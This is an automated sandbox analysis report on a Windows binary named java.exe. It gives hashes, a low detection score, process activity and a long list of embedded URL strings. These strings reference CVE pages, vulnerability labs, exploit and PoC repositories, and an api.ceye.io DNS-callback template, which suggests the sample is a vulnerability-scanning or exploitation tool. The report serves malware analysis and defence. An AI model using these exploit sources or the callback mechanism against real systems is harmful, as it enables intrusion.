Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
java.exe

Overview

General Information

Sample name:java.exe
Analysis ID:1431417
MD5:422a5d9f38ad412abef13439d5e0e632
SHA1:673ec8a109e80f54e9efebe45566201c7d16ed18
SHA256:9f015bb5d3e290b311c6e66cd5c597b7bdca42066faa46d047bcc6eb418cfdd7
Tags:exe
Infos:

Detection

Score:22
Range:0 - 100
Whitelisted:false
Confidence:40%

Signatures

Exploit detected, runtime environment starts unknown processes
PE file contains more sections than normal
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device

Classification

Analysis Advice

Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample reads itself and does not show any behavior, likely it performs some host environment checks which are compared to an embedded key
  • System is w10x64
  • java.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\java.exe" MD5: 422A5D9F38AD412ABEF13439D5E0E632)
    • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results
Source: java.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Software Vulnerabilities

barindex
Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\System32\conhost.exe
Source: java.exeString found in binary or memory: http://%s.%sSyntax
Source: java.exeString found in binary or memory: http://0day5.com/archives/1173/name:
Source: java.exeString found in binary or memory: http://0day5.com/archives/4249/
Source: java.exeString found in binary or memory: http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8
Source: java.exeString found in binary or memory: http://127.0.0.1:8080
Source: java.exeString found in binary or memory: http://127.0.0.1:show
Source: java.exeString found in binary or memory: http://127.1.1.1:700
Source: java.exeString found in binary or memory: http://airflow.apache.org/
Source: java.exeString found in binary or memory: http://api.ceye.io/v1/records?token=%s&type=dns&filter=%sssh:
Source: java.exeString found in binary or memory: http://baidu.com/api/v1/targets
Source: java.exeString found in binary or memory: http://baidu.com/api/v1/targets/?test.yml
Source: java.exeString found in binary or memory: http://bea.com/2004/06/soap/workarea/
Source: java.exeString found in binary or memory: http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html
Source: java.exeString found in binary or memory: http://ckeditor.com
Source: java.exeString found in binary or memory: http://cve-2018-7600-8-x.vulnet:8080/
Source: java.exeString found in binary or memory: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770
Source: java.exeString found in binary or memory: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16313
Source: java.exeString found in binary or memory: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9757
Source: java.exeString found in binary or memory: http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
Source: java.exeString found in binary or memory: http://foreversong.cn/archives/1378
Source: java.exeString found in binary or memory: http://forum.panabit.com/thread-10830-1-1.htmlNCHARNUMBERSB1FLOATNullStrVarNumLONGVARCHARROWIDDATEVa
Source: java.exeString found in binary or memory: http://github.com/hackgov)
Source: java.exeString found in binary or memory: http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8
Source: java.exeString found in binary or memory: http://luckyzmj.cn/posts/15dff4d3.html
Source: java.exeString found in binary or memory: http://luckyzmj.cn/posts/15dff4d3.htmlname:
Source: java.exeString found in binary or memory: http://print1n.top)
Source: java.exeString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: java.exeString found in binary or memory: http://webkiller.cn/)
Source: java.exeString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E4%B8%89%E
Source: java.exeString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E8%BF%88%E
Source: java.exeString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E
Source: java.exeString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%
Source: java.exeString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8
Source: java.exeString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3
Source: java.exeString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94
Source: java.exeString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E4%B8%AD%E5%88%9B%E8%A7%8
Source: java.exeString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%AE%89%E7%BE%8E%E6%95%B
Source: java.exeString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8
Source: java.exeString found in binary or memory: http://wiki.peiqi.tech/wiki/iot/HIKVISION/HIKVISION%20%E8%A7%86%E9%A2%91%E7%BC%96%E7%A0%81%E8%AE%BE%
Source: java.exeString found in binary or memory: http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20status.jsp%20%E4%BF%
Source: java.exeString found in binary or memory: http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B
Source: java.exeString found in binary or memory: http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.7%20auth_mobi.php%20%
Source: java.exeString found in binary or memory: http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v2017%20action_upload.php
Source: java.exeString found in binary or memory: http://wiki.peiqi.tech/wiki/webapp/AtlassianConfluence/Atlassian%20Confluence%20OGNL%E6%B3%A8%E5%85%
Source: java.exeString found in binary or memory: http://wiki.xypbk.com/IOT%E5%AE%89%E5%85%A8/ZeroShell/ZeroShell%203.9.0%20%E8%BF%9C%E7%A8%8B%E5%91%B
Source: java.exeString found in binary or memory: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E
Source: java.exeString found in binary or memory: http://www-3.ibm.com/services/uddi/inquiryapi
Source: java.exeString found in binary or memory: http://www-3.ibm.com/services/uddi/v2beta/inquiryapi
Source: java.exeString found in binary or memory: http://www.baidu.com/search/error.html
Source: java.exeString found in binary or memory: http://www.bea.com/async/AsyncResponseService
Source: java.exeString found in binary or memory: http://www.bt.cn/bbs)The
Source: java.exeString found in binary or memory: http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315name:
Source: java.exeString found in binary or memory: http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-1728
Source: java.exeString found in binary or memory: http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-181
Source: java.exeString found in binary or memory: http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-1548
Source: java.exeString found in binary or memory: http://www.cnxunchi.com
Source: java.exeString found in binary or memory: http://www.ctfiot.com/13682.html
Source: java.exeString found in binary or memory: http://www.dedeyuan.com/xueyuan/wenti/1244.html
Source: java.exeString found in binary or memory: http://www.iwantacve.cn/index.php/archives/311/
Source: java.exeString found in binary or memory: http://www.lmxspace.com/)
Source: java.exeString found in binary or memory: http://www.polaris-lab.com/index.php/archives/253/
Source: java.exeString found in binary or memory: http://www.tongda2000.com
Source: java.exeString found in binary or memory: http://www.tp-shop.cn
Source: java.exeString found in binary or memory: http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%
Source: java.exeString found in binary or memory: http://www.xdoa.cn
Source: java.exeString found in binary or memory: http://wx.weaver)(
Source: java.exeString found in binary or memory: http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742
Source: java.exeString found in binary or memory: https://about.gitlab.com/)(/CLodopfuncs.js
Source: java.exeString found in binary or memory: https://anonfiles.com/A4cede8an1/_OA_WorkflowCenterTreeData_oracle_html
Source: java.exeString found in binary or memory: https://bbs.secnet.cn/post/t-30
Source: java.exeString found in binary or memory: https://blog.51cto.com/13770310/2156663
Source: java.exeString found in binary or memory: https://blog.csdn.net/DFMASTER/article/details/108547352
Source: java.exeString found in binary or memory: https://blog.csdn.net/caiqiiqi/article/details/112005424
Source: java.exeString found in binary or memory: https://blog.csdn.net/dfdhxb995397/article/details/101385340
Source: java.exeString found in binary or memory: https://blog.csdn.net/fnmsd)
Source: java.exeString found in binary or memory: https://blog.csdn.net/fnmsd/article/details/88657083
Source: java.exeString found in binary or memory: https://blog.csdn.net/fnmsd/article/details/89235589name:
Source: java.exeString found in binary or memory: https://blog.csdn.net/ge00111/article/details/72765210name:
Source: java.exeString found in binary or memory: https://blog.csdn.net/god_7z1/article/details/8180454
Source: java.exeString found in binary or memory: https://blog.csdn.net/qq_36374896/article/details/84839891
Source: java.exeString found in binary or memory: https://blog.csdn.net/qq_36923426/article/details/111361158
Source: java.exeString found in binary or memory: https://blog.csdn.net/qq_41503511/article/details/116274406
Source: java.exeString found in binary or memory: https://blog.csdn.net/u012206617/article/details/109107210
Source: java.exeString found in binary or memory: https://blog.csdn.net/weixin_39779975/article/details/111091529
Source: java.exeString found in binary or memory: https://blog.csdn.net/weixin_40709439/article/details/82780606
Source: java.exeString found in binary or memory: https://blog.csdn.net/weixin_42633229/article/details/117070546name:
Source: java.exeString found in binary or memory: https://blog.csdn.net/weixin_44578334/article/details/110917053
Source: java.exeString found in binary or memory: https://blog.csdn.net/xuandao_ahfengren/article/details/111402955
Source: java.exeString found in binary or memory: https://blog.csdn.net/ystyaoshengting/article/details/82734888name:
Source: java.exeString found in binary or memory: https://blog.csdn.net/zy15667076526/article/details/111413979
Source: java.exeString found in binary or memory: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
Source: java.exeString found in binary or memory: https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
Source: java.exeString found in binary or memory: https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
Source: java.exeString found in binary or memory: https://blog.star7th.com/2016/05/2007.htmlname:
Source: java.exeString found in binary or memory: https://blog.unauthorizedaccess.nl/2020/07/07/adventures-in-citrix-security-research.html
Source: java.exeString found in binary or memory: https://buaq.net/go-53721.html
Source: java.exeString found in binary or memory: https://bugs.shuimugan.com/bug/view?bug_no=0108235
Source: java.exeString found in binary or memory: https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb
Source: java.exeString found in binary or memory: https://cert.360.cn/warning/detail?id=fba518d5fc5c4ed4ebedff1dab24caf2
Source: java.exeString found in binary or memory: https://cloud.tencent.com/developer/article/1472550
Source: java.exeString found in binary or memory: https://cloud.tencent.com/developer/news/312276
Source: java.exeString found in binary or memory: https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
Source: java.exeString found in binary or memory: https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html
Source: java.exeString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1871name:
Source: java.exeString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10736
Source: java.exeString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10737
Source: java.exeString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10738
Source: java.exeString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14179
Source: java.exeString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5284name:
Source: java.exeString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376
Source: java.exeString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019
Source: java.exeString found in binary or memory: https://cwiki.apache.org/confluence/display/AMBARI/Quick
Source: java.exeString found in binary or memory: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
Source: java.exeString found in binary or memory: https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
Source: java.exeString found in binary or memory: https://dmaasland.github.io/posts/citrix.html
Source: java.exeString found in binary or memory: https://docs.influxdata.com/influxdb/v1.7/tools/api/name:
Source: java.exeString found in binary or memory: https://docs.min.io/cn/
Source: java.exeString found in binary or memory: https://edr.sangfor.com.cn/
Source: java.exeString found in binary or memory: https://exp1orer.github.io
Source: java.exeString found in binary or memory: https://fengchenzxc.github.io/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6
Source: java.exeString found in binary or memory: https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9d
Source: java.exeString found in binary or memory: https://git.sp0re.sh/sp0re/Nhttpd-exploits
Source: java.exeString found in binary or memory: https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI
Source: java.exeString found in binary or memory: https://github.com/0x-zmz
Source: java.exeString found in binary or memory: https://github.com/2357000166)
Source: java.exeString found in binary or memory: https://github.com/Aiminsun/CVE-2021-36260
Source: java.exeString found in binary or memory: https://github.com/Aquilao)
Source: java.exeString found in binary or memory: https://github.com/B1anda0)
Source: java.exeString found in binary or memory: https://github.com/CouchCMS/CouchCMS/issues/46
Source: java.exeString found in binary or memory: https://github.com/Facker007)
Source: java.exeString found in binary or memory: https://github.com/FiveAourThe)
Source: java.exeString found in binary or memory: https://github.com/For3stCo1d)
Source: java.exeString found in binary or memory: https://github.com/IsaacQiang)
Source: java.exeString found in binary or memory: https://github.com/Jarcis-cy)
Source: java.exeString found in binary or memory: https://github.com/JcQSteven/blog/issues/18
Source: java.exeString found in binary or memory: https://github.com/JrDw0/)
Source: java.exeString found in binary or memory: https://github.com/LandGrey/SpringBootVulExploit
Source: java.exeString found in binary or memory: https://github.com/LandGrey/flink-unauth-rce
Source: java.exeString found in binary or memory: https://github.com/Loneyers)
Source: java.exeString found in binary or memory: https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write
Source: java.exeString found in binary or memory: https://github.com/Loneyers/vuldocker/tree/master/next.js
Source: java.exeString found in binary or memory: https://github.com/Loneyers/vuldocker/tree/master/spring/CVE-2019-3799
Source: java.exeString found in binary or memory: https://github.com/MaxSecurity)
Source: java.exeString found in binary or memory: https://github.com/Medicean/VulApps/tree/master/w/wordpress/2
Source: java.exeString found in binary or memory: https://github.com/Mr-xn/spring-core-rce
Source: java.exeString found in binary or memory: https://github.com/Mr-xn/spring-core-rcename:
Source: java.exeString found in binary or memory: https://github.com/MrPointSun)
Source: java.exeString found in binary or memory: https://github.com/NS-Sp4ce/Inspur
Source: java.exeString found in binary or memory: https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner/blob/master/scanner.py
Source: java.exeString found in binary or memory: https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%8
Source: java.exeString found in binary or memory: https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%B
Source: java.exeString found in binary or memory: https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%B
Source: java.exeString found in binary or memory: https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6
Source: java.exeString found in binary or memory: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%
Source: java.exeString found in binary or memory: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%
Source: java.exeString found in binary or memory: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_W
Source: java.exeString found in binary or memory: https://github.com/PickledFish)
Source: java.exeString found in binary or memory: https://github.com/Print1n)
Source: java.exeString found in binary or memory: https://github.com/QAX-A-Team/WeblogicEnvironment
Source: java.exeString found in binary or memory: https://github.com/Sndav)
Source: java.exeString found in binary or memory: https://github.com/Soveless)
Source: java.exeString found in binary or memory: https://github.com/Sup3rm4nx0x)
Source: java.exeString found in binary or memory: https://github.com/ThestaRY7/)
Source: java.exeString found in binary or memory: https://github.com/WhiteHSBG)
Source: java.exeString found in binary or memory: https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-e
Source: java.exeString found in binary or memory: https://github.com/YMFE/yapi/issues/2229
Source: java.exeString found in binary or memory: https://github.com/ab1gale/phpcms-2008-CVE-2018-19127
Source: java.exeString found in binary or memory: https://github.com/abcRosexyz)
Source: java.exeString found in binary or memory: https://github.com/alibaba/druid
Source: java.exeString found in binary or memory: https://github.com/alibaba/nacos/issues/4593
Source: java.exeString found in binary or memory: https://github.com/alt3kx/CVE-2021-21985_PoC
Source: java.exeString found in binary or memory: https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/
Source: java.exeString found in binary or memory: https://github.com/betta-cyber)
Source: java.exeString found in binary or memory: https://github.com/bufsnake)
Source: java.exeString found in binary or memory: https://github.com/canc3s)
Source: java.exeString found in binary or memory: https://github.com/cc8ci)
Source: java.exeString found in binary or memory: https://github.com/chaosec2021
Source: java.exeString found in binary or memory: https://github.com/dahua966/)
Source: java.exeString found in binary or memory: https://github.com/dem0ns)
Source: java.exeString found in binary or memory: https://github.com/dem0ns/improper
Source: java.exeString found in binary or memory: https://github.com/dem0ns/improper/tree/master/laravel/5_debug
Source: java.exeString found in binary or memory: https://github.com/dreadlocked/Drupalgeddon2
Source: java.exeString found in binary or memory: https://github.com/evi1code/Just-for-fun/issues/2
Source: java.exeString found in binary or memory: https://github.com/ffay/lanproxy/issues/152
Source: java.exeString found in binary or memory: https://github.com/fnmsd)
Source: java.exeString found in binary or memory: https://github.com/fuzz7j)
Source: java.exeString found in binary or memory: https://github.com/goharbor/harbor/issues/8951
Source: java.exeString found in binary or memory: https://github.com/ha9worm)
Source: java.exeString found in binary or memory: https://github.com/hackgov)
Source: java.exeString found in binary or memory: https://github.com/hanxiansheng26)
Source: java.exeString found in binary or memory: https://github.com/harris2015)
Source: java.exeString found in binary or memory: https://github.com/ianxtianxt/Pyspider-webui-poc
Source: java.exeString found in binary or memory: https://github.com/imjdl/CVE-2020-8515-PoC
Source: java.exeString found in binary or memory: https://github.com/immunIT/CVE-2018-11759
Source: java.exeString found in binary or memory: https://github.com/j4ckzh0u)
Source: java.exeString found in binary or memory: https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py
Source: java.exeString found in binary or memory: https://github.com/jas502n/CVE-2019-11510-1
Source: java.exeString found in binary or memory: https://github.com/jas502n/CVE-2019-6340
Source: java.exeString found in binary or memory: https://github.com/jas502n/CVE-2019-7238
Source: java.exeString found in binary or memory: https://github.com/jinqi520
Source: java.exeString found in binary or memory: https://github.com/jujumanman)
Source: java.exeString found in binary or memory: https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh
Source: java.exeString found in binary or memory: https://github.com/jweny)
Source: java.exeString found in binary or memory: https://github.com/kmahyyg)
Source: java.exeString found in binary or memory: https://github.com/knqyf263/CVE-2019-6340
Source: java.exeString found in binary or memory: https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.mdname:
Source: java.exeString found in binary or memory: https://github.com/kzaopa)
Source: java.exeString found in binary or memory: https://github.com/last0monster)
Source: java.exeString found in binary or memory: https://github.com/masahiro331/CVE-2019-10758
Source: java.exeString found in binary or memory: https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse
Source: java.exeString found in binary or memory: https://github.com/mpgn/CVE-2018-11686
Source: java.exeString found in binary or memory: https://github.com/mstxq17/CodeCheck/
Source: java.exeString found in binary or memory: https://github.com/mumu0215)
Source: java.exeString found in binary or memory: https://github.com/neal1991)
Source: java.exeString found in binary or memory: https://github.com/neverendxxxxxx)
Source: java.exeString found in binary or memory: https://github.com/notwhy)
Source: java.exeString found in binary or memory: https://github.com/nu0l)
Source: java.exeString found in binary or memory: https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E8%9D%B6OA%20server_file%20%E7%9B%AE%E5%BD%95%E
Source: java.exeString found in binary or memory: https://github.com/opsxcq/exploit-CVE-2014-6271name:
Source: java.exeString found in binary or memory: https://github.com/projectzeroindia/CVE-2019-11510name:
Source: java.exeString found in binary or memory: https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7
Source: java.exeString found in binary or memory: https://github.com/pululin)
Source: java.exeString found in binary or memory: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_ofbiz_
Source: java.exeString found in binary or memory: https://github.com/rapid7/metasploit-framework/pull/13807/files
Source: java.exeString found in binary or memory: https://github.com/rconfig/rconfig/commit/6ea92aa307e20f0918ebd18be9811e93048d5071
Source: java.exeString found in binary or memory: https://github.com/security-kma/EXPLOITING-CVE-2019-14205
Source: java.exeString found in binary or memory: https://github.com/shadown1ng)
Source: java.exeString found in binary or memory: https://github.com/shadown1ng)name:
Source: java.exeString found in binary or memory: https://github.com/shmilylty)
Source: java.exeString found in binary or memory: https://github.com/spring-cloud/spring-cloud-configname:
Source: java.exeString found in binary or memory: https://github.com/star7th/showdoc/pull/1059
Source: java.exeString found in binary or memory: https://github.com/star7th/showdoc/pull/1059name:
Source: java.exeString found in binary or memory: https://github.com/tangxiaofeng7)
Source: java.exeString found in binary or memory: https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit
Source: java.exeString found in binary or memory: https://github.com/verctor/nexus_rce_CVE-2019-7238
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.mdname:
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-40438
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/blob/master/laravel/CVE-2021-3129
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-16846/README.zh-cn.md
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861name:
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396name:
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/django/CVE-2018-14574
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704name:
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/ecshop/collection_list-sqli
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-1427name:
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533name:
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/glassfish/4.1.0name:
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/h2database/h2-console-unacc
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2017-8917name:
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2019-7238
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823name:
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841name:
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/spark/unaccAn
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/spring/CVE-2016-4977
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rcename:
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/uwsgi/CVE-2018-7490name:
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107
Source: java.exeString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134name:
Source: java.exeString found in binary or memory: https://github.com/whami-root)
Source: java.exeString found in binary or memory: https://github.com/whami-rootname:
Source: java.exeString found in binary or memory: https://github.com/whwlsfb)
Source: java.exeString found in binary or memory: https://github.com/wulalalaaa)
Source: java.exeString found in binary or memory: https://github.com/wuzhicms/wuzhicms/issues/184
Source: java.exeString found in binary or memory: https://hackfun.org/)
Source: java.exeString found in binary or memory: https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3
Source: java.exeString found in binary or memory: https://hub.docker.com/r/petergrace/opentsdb-docker
Source: java.exeString found in binary or memory: https://hub.docker.com/r/petergrace/opentsdb-dockername:
Source: java.exeString found in binary or memory: https://idc.wanyunshuju.com/aqld/2123.htmlname:
Source: java.exeString found in binary or memory: https://imlonghao.com/)
Source: java.exeString found in binary or memory: https://infosecdb.wordpress.com/2020/01/05/gilacms-1-11-8-admin-sqlquery-sql-injection/
Source: java.exeString found in binary or memory: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
Source: java.exeString found in binary or memory: https://jira.atlassian.com/browse/JRASERVER-69793
Source: java.exeString found in binary or memory: https://kb.cert.org/vuls/id/843464name:
Source: java.exeString found in binary or memory: https://lists.apache.org/thread.html/r84ccbfc67bfddd35dced494a1f1cba504f49ac60a2a2ae903c5492c3%40%3C
Source: java.exeString found in binary or memory: https://localhost/index.php/Home/uploadify/fileList?type=.
Source: java.exeString found in binary or memory: https://lorexxar.cn)
Source: java.exeString found in binary or memory: https://max.book118.com/html/2017/0623/117514590.shtmname:
Source: java.exeString found in binary or memory: https://medium.com/
Source: java.exeString found in binary or memory: https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg
